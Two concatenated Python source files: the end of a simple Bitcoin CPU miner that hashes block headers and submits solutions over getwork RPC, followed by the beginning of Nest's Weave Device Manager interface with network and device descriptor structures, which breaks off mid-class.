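#   rpc.getwork([solution_hex])    # getwork with a data param submits a solution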
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
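# Worked examples for the helpers above (added note, values worked out by hand):
#   uint32(0x112345678)     -> 0x12345678    (truncate to 32 bits)
#   bytereverse(0x12345678) -> 0x78563412    (swap byte order within one word)
#   bufreverse('\x11\x22\x33\x44\x55\x66\x77\x88')
#       -> '\x44\x33\x22\x11\x88\x77\x66\x55'  (swap bytes within each 32-bit word)
#   wordreverse('\x11\x22\x33\x44\x55\x66\x77\x88')
#       -> '\x55\x66\x77\x88\x11\x22\x33\x44'  (reverse the order of 32-bit words)
# Applied together, these convert between getwork's hex byte ordering and the
# ordering needed to compare the final hash against the target as an integer.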
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
		# the first 76 bytes of the 80-byte header do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
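		# Added note: sha256 is a streaming hash, so the 76-byte prefix is
		# absorbed once here as a reusable "midstate"; each nonce trial below
		# copies the midstate and feeds only the 4 nonce bytes, rather than
		# rehashing the full 80-byte header on every attempt.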
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8234
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
WeaveDeviceMgr.py
|
#
# Copyright (c) 2013-2018 Nest Labs, Inc.
# Copyright (c) 2019-2020 Google, LLC.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# Python interface for Weave Device Manager
#
"""Weave Device Manager interface
"""
from __future__ import absolute_import
from __future__ import print_function
import functools
import sys
import os
import re
import copy
import binascii
import datetime
import time
import glob
import platform
import ast
from threading import Thread, Lock, Event
from ctypes import *
import six
from six.moves import range
from .WeaveUtility import WeaveUtility
from .WeaveStack import *
__all__ = [ 'WeaveDeviceManager', 'NetworkInfo', 'DeviceDescriptor' ]
NetworkType_WiFi = 1
NetworkType_Thread = 2
WiFiMode_AdHoc = 1
WiFiMode_Managed = 2
WiFiRole_Station = 1
WiFiRole_AccessPoint = 2
WiFiSecurityType_None = 1
WiFiSecurityType_WEP = 2
WiFiSecurityType_WPAPersonal = 3
WiFiSecurityType_WPA2Personal = 4
WiFiSecurityType_WPA2MixedPersonal = 5
WiFiSecurityType_WPAEnterprise = 6
WiFiSecurityType_WPA2Enterprise = 7
WiFiSecurityType_WPA2MixedEnterprise = 8
WiFiSecurityType_WPA3Personal = 9
WiFiSecurityType_WPA3MixedPersonal = 10
WiFiSecurityType_WPA3Enterprise = 11
WiFiSecurityType_WPA3MixedEnterprise = 12
ThreadPANId_NotSpecified = 0xFFFFFFFF
ThreadChannel_NotSpecified = 0xFF
RendezvousMode_EnableWiFiRendezvousNetwork = 0x0001
RendezvousMode_Enable802154RendezvousNetwork = 0x0002
RendezvousMode_EnableFabricRendezvousAddress = 0x0004
TargetFabricId_AnyFabric = 0xFFFFFFFFFFFFFFFF
TargetFabricId_NotInFabric = 0
TargetDeviceMode_Any = 0x00000000 # Locate all devices regardless of mode.
TargetDeviceMode_UserSelectedMode = 0x00000001 # Locate all devices in 'user-selected' mode -- i.e. where the device
                                               # has been directly identified by a user, e.g. by pressing a button.
TargetVendorId_Any = 0xFFFF
TargetProductId_Any = 0xFFFF
TargetDeviceId_Any = 0xFFFFFFFFFFFFFFFF
DeviceFeature_HomeAlarmLinkCapable = 0x00000001 # Indicates a Nest Protect that supports connection to a home alarm panel
DeviceFeature_LinePowered = 0x00000002 # Indicates a device that requires line power
SystemTest_ProductList = { 'thermostat' : 0x235A000A,
'topaz' : 0x235A0003}
DeviceDescriptorFlag_IsRendezvousWiFiESSIDSuffix = 0x01
class NetworkInfo:
def __init__(self, networkType=None, networkId=None, wifiSSID=None, wifiMode=None, wifiRole=None,
wifiSecurityType=None, wifiKey=None,
threadNetworkName=None, threadExtendedPANId=None, threadNetworkKey=None, threadPSKc=None,
wirelessSignalStrength=None, threadPANId=None, threadChannel=None):
self.NetworkType = networkType
self.NetworkId = networkId
self.WiFiSSID = wifiSSID
self.WiFiMode = wifiMode
self.WiFiRole = wifiRole
self.WiFiSecurityType = wifiSecurityType
self.WiFiKey = wifiKey
self.ThreadNetworkName = threadNetworkName
self.ThreadExtendedPANId = threadExtendedPANId
self.ThreadNetworkKey = threadNetworkKey
self.ThreadPSKc = threadPSKc
self.ThreadPANId = threadPANId
self.ThreadChannel = threadChannel
self.WirelessSignalStrength = wirelessSignalStrength
def Print(self, prefix=""):
print("%sNetwork Type: %s" % (prefix, NetworkTypeToString(self.NetworkType)))
if self.NetworkId != None:
print("%sNetwork Id: %d" % (prefix, self.NetworkId))
if self.WiFiSSID != None:
print("%sWiFi SSID: \"%s\"" % (prefix, self.WiFiSSID))
if self.WiFiMode != None:
print("%sWiFi Mode: %s" % (prefix, WiFiModeToString(self.WiFiMode)))
if self.WiFiRole != None:
print("%sWiFi Role: %s" % (prefix, WiFiRoleToString(self.WiFiRole)))
if self.WiFiSecurityType != None:
print("%sWiFi Security Type: %s" % (prefix, WiFiSecurityTypeToString(self.WiFiSecurityType)))
if self.WiFiKey != None:
print("%sWiFi Key: %s" % (prefix, self.WiFiKey))
if self.ThreadNetworkName != None:
print("%sThread Network Name: \"%s\"" % (prefix, self.ThreadNetworkName))
if self.ThreadExtendedPANId != None:
print("%sThread Extended PAN Id: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.ThreadExtendedPANId)))
if self.ThreadNetworkKey != None:
print("%sThread Network Key: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.ThreadNetworkKey)))
if self.ThreadPSKc != None:
print("%sThread Network PSKc: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.ThreadPSKc)))
if self.ThreadPANId != None:
print("%sThread PAN Id: %04x" % (prefix, self.ThreadPANId))
if self.ThreadChannel != None:
print("%sThread Channel: %d" % (prefix, self.ThreadChannel))
if self.WirelessSignalStrength != None:
print("%sWireless Signal Strength: %s" % (prefix, self.WirelessSignalStrength))
def SetField(self, name, val):
        name = name.lower()
if (name == 'networktype' or name == 'network-type' or name == 'type'):
self.NetworkType = ParseNetworkType(val)
elif (name == 'networkid' or name == 'network-id' or name == 'id'):
self.NetworkId = int(val)
elif (name == 'wifissid' or name == 'wifi-ssid' or name == 'ssid'):
self.WiFiSSID = val
elif (name == 'wifimode' or name == 'wifi-mode'):
self.WiFiMode = ParseWiFiMode(val)
elif (name == 'wifirole' or name == 'wifi-role'):
self.WiFiRole = ParseWiFiRole(val)
elif (name == 'wifisecuritytype' or name == 'wifi-security-type' or name == 'securitytype' or name == 'security-type' or name == 'wifi-security' or name == 'security'):
self.WiFiSecurityType = ParseSecurityType(val)
elif (name == 'wifikey' or name == 'wifi-key' or name == 'key'):
self.WiFiKey = val
elif (name == 'threadnetworkname' or name == 'thread-network-name' or name == 'thread-name'):
self.ThreadNetworkName = val
elif (name == 'threadextendedpanid' or name == 'thread-extended-pan-id'):
self.ThreadExtendedPANId = val
elif (name == 'threadnetworkkey' or name == 'thread-network-key' or name == 'thread-key'):
self.ThreadNetworkKey = val
elif (name == 'threadpskc' or name == 'thread-pskc' or name == 'pskc'):
self.ThreadPSKc = val
elif (name == 'threadpanid' or name == 'thread-pan-id' or name == 'pan-id'):
self.ThreadPANId = val
elif (name == 'threadchannel' or name == 'thread-channel'):
self.ThreadChannel = val
elif (name == 'wirelesssignalstrength' or name == 'wireless-signal-strength'):
self.WirelessSignalStrength = val
else:
raise Exception("Invalid NetworkInfo field: " + str(name))
class DeviceDescriptor:
def __init__(self, deviceId=None, fabricId=None, vendorId=None, productId=None, productRevision=None,
manufacturingYear=None, manufacturingMonth=None, manufacturingDay=None,
primary802154MACAddress=None, primaryWiFiMACAddress=None,
serialNumber=None, softwareVersion=None, rendezvousWiFiESSID=None, pairingCode=None,
pairingCompatibilityVersionMajor=None, pairingCompatibilityVersionMinor=None,
deviceFeatures=None, flags=None):
self.DeviceId = deviceId
self.FabricId = fabricId
self.VendorId = vendorId
self.ProductId = productId
self.ProductRevision = productRevision
self.ManufacturingYear = manufacturingYear
self.ManufacturingMonth = manufacturingMonth
self.ManufacturingDay = manufacturingDay
self.Primary802154MACAddress = primary802154MACAddress
self.PrimaryWiFiMACAddress = primaryWiFiMACAddress
self.SerialNumber = serialNumber
self.SoftwareVersion = softwareVersion
self.RendezvousWiFiESSID = rendezvousWiFiESSID
self.PairingCode = pairingCode
self.PairingCompatibilityVersionMajor = pairingCompatibilityVersionMajor
self.PairingCompatibilityVersionMinor = pairingCompatibilityVersionMinor
self.DeviceFeatures = [ ]
if deviceFeatures != None:
featureVal = 1
while featureVal != 0x80000000:
if (deviceFeatures & featureVal) == featureVal:
self.DeviceFeatures.append(featureVal)
featureVal <<= 1
self.Flags = flags if flags != None else 0
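        # Added note: the loop above unpacks the deviceFeatures bit mask into
        # a list; e.g. deviceFeatures == 0x03 yields
        # [DeviceFeature_HomeAlarmLinkCapable, DeviceFeature_LinePowered].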
def Print(self, prefix=""):
if self.DeviceId != None:
print("%sDevice Id: %016X" % (prefix, self.DeviceId))
if self.FabricId != None:
print("%sFabrid Id: %016X" % (prefix, self.FabricId))
if self.VendorId != None:
print("%sVendor Id: %X" % (prefix, self.VendorId))
if self.ProductId != None:
print("%sProduct Id: %X" % (prefix, self.ProductId))
if self.ProductRevision != None:
print("%sProduct Revision: %X" % (prefix, self.ProductRevision))
if self.SerialNumber != None:
print("%sSerial Number: %s" % (prefix, self.SerialNumber))
if self.SoftwareVersion != None:
print("%sSoftware Version: %s" % (prefix, self.SoftwareVersion))
if self.ManufacturingYear != None and self.ManufacturingMonth != None:
if self.ManufacturingDay != None:
print("%sManufacturing Date: %04d/%02d/%02d" % (prefix, self.ManufacturingYear, self.ManufacturingMonth, self.ManufacturingDay))
else:
print("%sManufacturing Date: %04d/%02d" % (prefix, self.ManufacturingYear, self.ManufacturingMonth))
if self.Primary802154MACAddress != None:
print("%sPrimary 802.15.4 MAC Address: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.Primary802154MACAddress)))
if self.PrimaryWiFiMACAddress != None:
print("%sPrimary WiFi MAC Address: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.PrimaryWiFiMACAddress)))
if self.RendezvousWiFiESSID != None:
print("%sRendezvous WiFi ESSID%s: %s" % (prefix, " Suffix" if self.IsRendezvousWiFiESSIDSuffix else "", self.RendezvousWiFiESSID))
if self.PairingCode != None:
print("%sPairing Code: %s" % (prefix, self.PairingCode))
if self.PairingCompatibilityVersionMajor != None:
print("%sPairing Compatibility Major Id: %X" % (prefix, self.PairingCompatibilityVersionMajor))
if self.PairingCompatibilityVersionMinor != None:
print("%sPairing Compatibility Minor Id: %X" % (prefix, self.PairingCompatibilityVersionMinor))
if self.DeviceFeatures != None:
print("%sDevice Features: %s" % (prefix, " ".join([DeviceFeatureToString(val) for val in self.DeviceFeatures])))
@property
def IsRendezvousWiFiESSIDSuffix(self):
return (self.Flags & DeviceDescriptorFlag_IsRendezvousWiFiESSIDSuffix) != 0
class WirelessRegConfig:
def __init__(self, regDomain=None, opLocation=None, supportedRegDomains=None):
self.RegDomain = regDomain
self.OpLocation = opLocation
self.SupportedRegDomains = supportedRegDomains
def Print(self, prefix=""):
if self.RegDomain != None:
print("%sRegulatory Domain: %s%s" % (prefix, self.RegDomain, ' (world wide)' if self.RegDomain == '00' else ''))
if self.OpLocation != None:
print("%sOperating Location: %s" % (prefix, OperatingLocationToString(self.OpLocation)))
if self.SupportedRegDomains != None:
print("%sSupported Regulatory Domains: %s" % (prefix, ','.join(self.SupportedRegDomains)))
class _IdentifyDeviceCriteriaStruct(Structure):
_fields_ = [
("TargetFabricId", c_uint64),
("TargetModes", c_uint32),
("TargetVendorId", c_uint16),
("TargetProductId", c_uint16),
("TargetDeviceId", c_uint64)
]
class _NetworkInfoStruct(Structure):
_fields_ = [
('NetworkType', c_int32), # The type of network.
('NetworkId', c_int64), # network id assigned to the network by the device, -1 if not specified.
('WiFiSSID', c_char_p), # The WiFi SSID.
('WiFiMode', c_int32), # The operating mode of the WiFi network.
('WiFiRole', c_int32), # The role played by the device on the WiFi network.
('WiFiSecurityType', c_int32), # The WiFi security type.
('WiFiKey', c_void_p), # The WiFi key, or NULL if not specified.
('WiFiKeyLen', c_uint32), # The length in bytes of the WiFi key.
('ThreadNetworkName', c_char_p), # The name of the Thread network.
('ThreadExtendedPANId', c_void_p), # The Thread extended PAN id (8 bytes).
('ThreadNetworkKey', c_void_p), # The Thread master network key.
('ThreadPSKc', c_void_p), # The Thread pre-shared key for commissioner
('ThreadPANId', c_uint32), # The 16-bit Thread PAN ID, or kThreadPANId_NotSpecified
('ThreadChannel', c_uint8), # The current channel on which the Thread network operates, or kThreadChannel_NotSpecified
('WirelessSignalStrength', c_int16),# The signal strength of the network, or INT16_MIN if not available/applicable.
('Hidden', c_bool) # Whether or not the network is hidden.
]
def toNetworkInfo(self):
return NetworkInfo(
networkType = self.NetworkType if self.NetworkType != -1 else None,
networkId = self.NetworkId if self.NetworkId != -1 else None,
wifiSSID = WeaveUtility.CStringToString(self.WiFiSSID),
wifiMode = self.WiFiMode if self.WiFiMode != -1 else None,
wifiRole = self.WiFiRole if self.WiFiRole != -1 else None,
wifiSecurityType = self.WiFiSecurityType if self.WiFiSecurityType != -1 else None,
wifiKey = WeaveUtility.VoidPtrToByteArray(self.WiFiKey, self.WiFiKeyLen),
threadNetworkName = WeaveUtility.CStringToString(self.ThreadNetworkName),
threadExtendedPANId = WeaveUtility.VoidPtrToByteArray(self.ThreadExtendedPANId, 8),
threadNetworkKey = WeaveUtility.VoidPtrToByteArray(self.ThreadNetworkKey, 16),
threadPSKc = WeaveUtility.VoidPtrToByteArray(self.ThreadPSKc, 16),
threadPANId = self.ThreadPANId if self.ThreadPANId != ThreadPANId_NotSpecified else None,
threadChannel = self.ThreadChannel if self.ThreadChannel != ThreadChannel_NotSpecified else None,
wirelessSignalStrength = self.WirelessSignalStrength if self.WirelessSignalStrength != -32768 else None
)
@classmethod
def fromNetworkInfo(cls, networkInfo):
networkInfoStruct = cls()
networkInfoStruct.NetworkType = networkInfo.NetworkType if networkInfo.NetworkType != None else -1
networkInfoStruct.NetworkId = networkInfo.NetworkId if networkInfo.NetworkId != None else -1
networkInfoStruct.WiFiSSID = WeaveUtility.StringToCString(networkInfo.WiFiSSID)
networkInfoStruct.WiFiMode = networkInfo.WiFiMode if networkInfo.WiFiMode != None else -1
networkInfoStruct.WiFiRole = networkInfo.WiFiRole if networkInfo.WiFiRole != None else -1
networkInfoStruct.WiFiSecurityType = networkInfo.WiFiSecurityType if networkInfo.WiFiSecurityType != None else -1
networkInfoStruct.WiFiKey = WeaveUtility.ByteArrayToVoidPtr(networkInfo.WiFiKey)
networkInfoStruct.WiFiKeyLen = len(networkInfo.WiFiKey) if (networkInfo.WiFiKey != None) else 0
networkInfoStruct.ThreadNetworkName = WeaveUtility.StringToCString(networkInfo.ThreadNetworkName)
networkInfoStruct.ThreadExtendedPANId = WeaveUtility.ByteArrayToVoidPtr(networkInfo.ThreadExtendedPANId)
networkInfoStruct.ThreadNetworkKey = WeaveUtility.ByteArrayToVoidPtr(networkInfo.ThreadNetworkKey)
networkInfoStruct.ThreadPSKc = WeaveUtility.ByteArrayToVoidPtr(networkInfo.ThreadPSKc)
networkInfoStruct.ThreadPANId = networkInfo.ThreadPANId if networkInfo.ThreadPANId != None else ThreadPANId_NotSpecified
networkInfoStruct.ThreadChannel = networkInfo.ThreadChannel if networkInfo.ThreadChannel != None else ThreadChannel_NotSpecified
networkInfoStruct.WirelessSignalStrength = networkInfo.WirelessSignalStrength if networkInfo.WirelessSignalStrength != None else -32768
return networkInfoStruct
class _DeviceDescriptorStruct(Structure):
_fields_ = [
('DeviceId', c_uint64), # Weave device id (0 = not present)
('FabricId', c_uint64), # Id of Weave fabric to which the device belongs (0 = not present)
('DeviceFeatures', c_uint32), # Bit field indicating support for specific device features.
('VendorId', c_uint16), # Device vendor id (0 = not present)
('ProductId', c_uint16), # Device product id (0 = not present)
('ProductRevision', c_uint16), # Device product revision (0 = not present)
('ManufacturingYear', c_uint16), # Year of device manufacture (valid range 2001 - 2099, 0 = not present)
('ManufacturingMonth', c_ubyte), # Month of device manufacture (1 = January, 0 = not present)
('ManufacturingDay', c_ubyte), # Day of device manufacture (0 = not present)
('Primary802154MACAddress', c_ubyte * 8), # MAC address for primary 802.15.4 interface (big-endian, all zeros = not present)
('PrimaryWiFiMACAddress', c_ubyte * 6), # MAC address for primary WiFi interface (big-endian, all zeros = not present)
('SerialNumber', c_char * 33), # Serial number of device (nul terminated, 0 length = not present)
('SoftwareVersion', c_char * 33), # Version of software running on the device (nul terminated, 0 length = not present)
('RendezvousWiFiESSID', c_char * 33), # ESSID for pairing WiFi network (nul terminated, 0 length = not present)
('PairingCode', c_char * 17), # Device pairing code (nul terminated, 0 length = not present)
('PairingCompatibilityVersionMajor', c_uint16), # Pairing software compatibility major version
('PairingCompatibilityVersionMinor', c_uint16), # Pairing software compatibility minor version
('Flags', c_ubyte), # Flags
]
def toDeviceDescriptor(self):
return DeviceDescriptor(
deviceId = self.DeviceId if self.DeviceId != 0 else None,
fabricId = self.FabricId if self.FabricId != 0 else None,
vendorId = self.VendorId if self.VendorId != 0 else None,
productId = self.ProductId if self.ProductId != 0 else None,
productRevision = self.ProductRevision if self.ProductRevision != 0 else None,
manufacturingYear = self.ManufacturingYear if self.ManufacturingYear != 0 else None,
manufacturingMonth = self.ManufacturingMonth if self.ManufacturingMonth != 0 else None,
manufacturingDay = self.ManufacturingDay if self.ManufacturingDay != 0 else None,
primary802154MACAddress = bytearray(self.Primary802154MACAddress) if not WeaveUtility.IsByteArrayAllZeros(self.Primary802154MACAddress) else None,
primaryWiFiMACAddress = bytearray(self.PrimaryWiFiMACAddress) if not WeaveUtility.IsByteArrayAllZeros(self.PrimaryWiFiMACAddress) else None,
serialNumber = WeaveUtility.CStringToString(self.SerialNumber) if len(self.SerialNumber) != 0 else None,
softwareVersion = WeaveUtility.CStringToString(self.SoftwareVersion) if len(self.SoftwareVersion) != 0 else None,
rendezvousWiFiESSID = WeaveUtility.CStringToString(self.RendezvousWiFiESSID) if len(self.RendezvousWiFiESSID) != 0 else None,
pairingCode = WeaveUtility.CStringToString(self.PairingCode) if len(self.PairingCode) != 0 else None,
pairingCompatibilityVersionMajor = self.PairingCompatibilityVersionMajor,
pairingCompatibilityVersionMinor = self.PairingCompatibilityVersionMinor,
deviceFeatures = self.DeviceFeatures,
flags = self.Flags)
class _WirelessRegDomain(Structure):
_fields_ = [
('Code', c_char * 2), # Wireless regulatory domain code (exactly 2 characters, non-null terminated)
]
def __str__(self, *args, **kwargs):
return ''.join(WeaveUtility.CStringToString(self.Code))
@classmethod
def fromStr(cls, val):
regDomainStruct = cls()
if val != None:
if len(val) != 2:
raise ValueError('Invalid wireless regulatory domain code: ' + val)
regDomainStruct.Code = WeaveUtility.StringToCString(val)
else:
regDomainStruct.Code = b'\0\0'
return regDomainStruct
class _WirelessRegConfigStruct(Structure):
_fields_ = [
('SupportedRegDomains', POINTER(_WirelessRegDomain)), # Array of _WirelessRegDomain structures
('NumSupportedRegDomains', c_uint16), # Length of SupportedRegDomains array
('RegDomain', _WirelessRegDomain), # Selected wireless regulatory domain
('OpLocation', c_ubyte), # Selected operating location
]
def toWirelessRegConfig(self):
return WirelessRegConfig(
regDomain = str(self.RegDomain) if self.RegDomain.Code[0] != 0 else None,
opLocation = self.OpLocation if self.OpLocation != 0xFF else None,
supportedRegDomains = [ str(self.SupportedRegDomains[i]) for i in range(0, self.NumSupportedRegDomains) ]
)
@classmethod
def fromWirelessRegConfig(cls, regConfig):
regConfigStruct = cls()
regConfigStruct.SupportedRegDomains = POINTER(_WirelessRegDomain)()
regConfigStruct.NumSupportedRegDomains = 0
regConfigStruct.RegDomain = _WirelessRegDomain.fromStr(regConfig.RegDomain)
regConfigStruct.OpLocation = regConfig.OpLocation if regConfig.OpLocation != None else 0
return regConfigStruct
_CompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_IdentifyDeviceCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, POINTER(_DeviceDescriptorStruct))
_PairTokenCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_uint32)
_UnpairTokenCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p)
_NetworkScanCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16, POINTER(_NetworkInfoStruct))
_AddNetworkCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint32)
_GetNetworksCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16, POINTER(_NetworkInfoStruct))
_GetCameraAuthDataCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_char_p, c_char_p)
_GetRendezvousModeCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_uint16)
_GetFabricConfigCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_uint32)
_ErrorFunct = CFUNCTYPE(None, c_void_p, c_void_p, c_ulong, POINTER(DeviceStatusStruct))
_GetBleEventFunct = CFUNCTYPE(c_void_p)
_WriteBleCharacteristicFunct = CFUNCTYPE(c_bool, c_void_p, c_void_p, c_void_p, c_void_p, c_uint16)
_SubscribeBleCharacteristicFunct = CFUNCTYPE(c_bool, c_void_p, c_void_p, c_void_p, c_bool)
_CloseBleFunct = CFUNCTYPE(c_bool, c_void_p)
_DeviceEnumerationResponseFunct = CFUNCTYPE(None, c_void_p, POINTER(_DeviceDescriptorStruct), c_char_p)
_GetWirelessRegulatoryConfigCompleteFunct = CFUNCTYPE(None, c_void_p, c_void_p, POINTER(_WirelessRegConfigStruct))
# This is a fix for WEAV-429. Jay Logue recommends revisiting this at a later
# date to allow for truly multiple instances, so this is temporary.
def _singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
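# Illustrative consequence of the wrapper above (added note):
#   mgr1 = WeaveDeviceManager()
#   mgr2 = WeaveDeviceManager()
#   assert mgr1 is mgr2   # both names refer to the single shared instance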
@_singleton
class WeaveDeviceManager(object):
def __init__(self, startNetworkThread=True):
self.devMgr = None
self.networkThread = None
self.networkThreadRunable = False
self._weaveStack = WeaveStack()
self._dmLib = None
self._InitLib()
devMgr = c_void_p(None)
res = self._dmLib.nl_Weave_DeviceManager_NewDeviceManager(pointer(devMgr))
if (res != 0):
raise self._weaveStack.ErrorToException(res)
self.devMgr = devMgr
self._weaveStack.devMgr = devMgr
def HandleDeviceEnumerationResponse(devMgr, deviceDescPtr, deviceAddrStr):
print(" Enumerated device IP: %s" % (WeaveUtility.CStringToString(deviceAddrStr)))
deviceDescPtr.contents.toDeviceDescriptor().Print(" ")
self.cbHandleDeviceEnumerationResponse = _DeviceEnumerationResponseFunct(HandleDeviceEnumerationResponse)
        self.blockingCB = None # set by other modules (BLE) that require servicing by this thread while it blocks.
self.cbHandleBleEvent = None # set by other modules (BLE) that provide event callback to Weave.
self.cbHandleBleWriteChar = None
self.cbHandleBleSubscribeChar = None
self.cbHandleBleClose = None
if (startNetworkThread):
self.StartNetworkThread()
def __del__(self):
if (self.devMgr != None):
self._dmLib.nl_Weave_DeviceManager_DeleteDeviceManager(self.devMgr)
self.devMgr = None
self.StopNetworkThread()
def DriveBleIO(self):
# perform asynchronous write to pipe in IO thread's select() to wake for BLE input
res = self._dmLib.nl_Weave_DeviceManager_WakeForBleIO()
if (res != 0):
raise self._weaveStack.ErrorToException(res)
def SetBleEventCB(self, bleEventCB):
if (self.devMgr != None):
self.cbHandleBleEvent = _GetBleEventFunct(bleEventCB)
self._dmLib.nl_Weave_DeviceManager_SetBleEventCB(self.cbHandleBleEvent)
def SetBleWriteCharCB(self, bleWriteCharCB):
if (self.devMgr != None):
self.cbHandleBleWriteChar = _WriteBleCharacteristicFunct(bleWriteCharCB)
self._dmLib.nl_Weave_DeviceManager_SetBleWriteCharacteristic(self.cbHandleBleWriteChar)
def SetBleSubscribeCharCB(self, bleSubscribeCharCB):
if (self.devMgr != None):
self.cbHandleBleSubscribeChar = _SubscribeBleCharacteristicFunct(bleSubscribeCharCB)
self._dmLib.nl_Weave_DeviceManager_SetBleSubscribeCharacteristic(self.cbHandleBleSubscribeChar)
def SetBleCloseCB(self, bleCloseCB):
if (self.devMgr != None):
self.cbHandleBleClose = _CloseBleFunct(bleCloseCB)
self._dmLib.nl_Weave_DeviceManager_SetBleClose(self.cbHandleBleClose)
def StartNetworkThread(self):
if (self.networkThread != None):
return
def RunNetworkThread():
while (self.networkThreadRunable):
self._weaveStack.networkLock.acquire()
self._dmLib.nl_Weave_DeviceManager_DriveIO(50)
self._weaveStack.networkLock.release()
time.sleep(0.005)
self.networkThread = Thread(target=RunNetworkThread, name="WeaveNetworkThread")
self.networkThread.daemon = True
self.networkThreadRunable = True
self.networkThread.start()
def StopNetworkThread(self):
if (self.networkThread != None):
self.networkThreadRunable = False
self.networkThread.join()
self.networkThread = None
def IsConnected(self):
return self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_IsConnected(self.devMgr)
)
def DeviceId(self):
return self._weaveStack.Call(
lambda: self._dmLib.nl_Weave_DeviceManager_DeviceId(self.devMgr)
)
def DeviceAddress(self):
return self._weaveStack.Call(
